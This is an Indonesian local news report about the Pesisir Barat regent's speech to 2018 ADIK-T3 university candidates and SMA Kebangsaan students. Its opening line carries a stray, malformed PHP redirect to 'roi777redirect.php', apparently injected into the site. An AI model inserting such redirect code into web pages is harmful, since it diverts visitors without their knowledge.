header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Bupati Agus Istiqlal Lepas Calon Mahasiswa PTN -
Bupati Agus Istiqlal Lepas Calon Mahasiswa PTN

TRANSLAMPUNG.COM, PESISIR BARAT – Bupati, Agus Istiqlal pada acara mengantarkan calon mahasiswa perguruan tinggi negeri (PTN) lulusan seleksi adik-T3 (Terdepan terluar tertinggal) dan calon siswa SMA (Sekolah menengah atas) kebangsaan tahun 2018. Di gedung wanita Krui, kecamatan Pesisir Tengah, Kamis (12/7).

Dalam sambutannya, Agus menyampaikan bahwa membangun Indonesia dari pinggiran dengan memperkuat daerah-daerah dan desa dalam kerangka Negara kesatuan menjadi visi pemerintahan Presiden, Joko Widodo dan wakil presiden (Wapres), Jusuf Kalla visi tersebut tertuang dalam nawacita ketiga.

“Dalam hal ini atas nama pemerintah kabupaten pesisir barat kita bersyukur kepada allah sang pencipta atas kelulusan putra-putri kita yang akan melanjutkan pendidikan di PTN dan SMA kebangsaan tahun 2018,” ujarnya dalam sambutannya.

Ini merupakan langkah awal, bagi kalian memulai kesuksesan dari tempat belajar yang baik, setelah melewati seleksi bersaing dengan sesama teman mereka pada waktu sebelumnya dan dinyatakan sebagai calon mahasiswa dan siswa, ini adalah kesempatan emas yang tidak boleh disia-siakan, terutama yang diterima pada program adik-T3 di PTN untuk yang kesekian kalinya pada tahun 2018.

“Oleh sebab itu, maka harus sedapat mungkin dimanfaatkan secara maksimal, ketika banyak lulusan SLTA lainnya bersusah payah bersaing dengan ratusan bahkan ribuan orang untuk dapat diterima di perguruan tinggi negeri, kalian dapat masuk perguruan tinggi negeri dengan menyisihkan saingan peserta seleksi seperti yang telah dilaporkan,” ungkapnya.

Selain itu Bupati juga berharap, kepada Siswa dan Siswi sekalian agar mengikuti perkuliahan dengan sungguh-sungguh, ukirlah prestasi akademik maupun non-akademik di kampus nanti, sehingga setelah lulus dapat mendharmabaktikan diri di Pesibar yang kita cintai ini.

“Tentu kalian dapat memahami dan mensukuri bahwa tidak mudah untuk diterima di PTN, oleh karena itu dengan belajar di SMA kebangsaan kalian dapat menyusul belajar di PTN seperti kakak-kakak kalian, bisa belajar di kampus yang bagus dan tidak membebani orang tua dengan biaya kuliah,. Dan nantinya setelah lulus dapat bersama-sama bekerja dan menopang pembangunan di negri sai batin ini dan para ulama ini bisa lebih maju lagi,” jelasnya. (r7)

News Reporter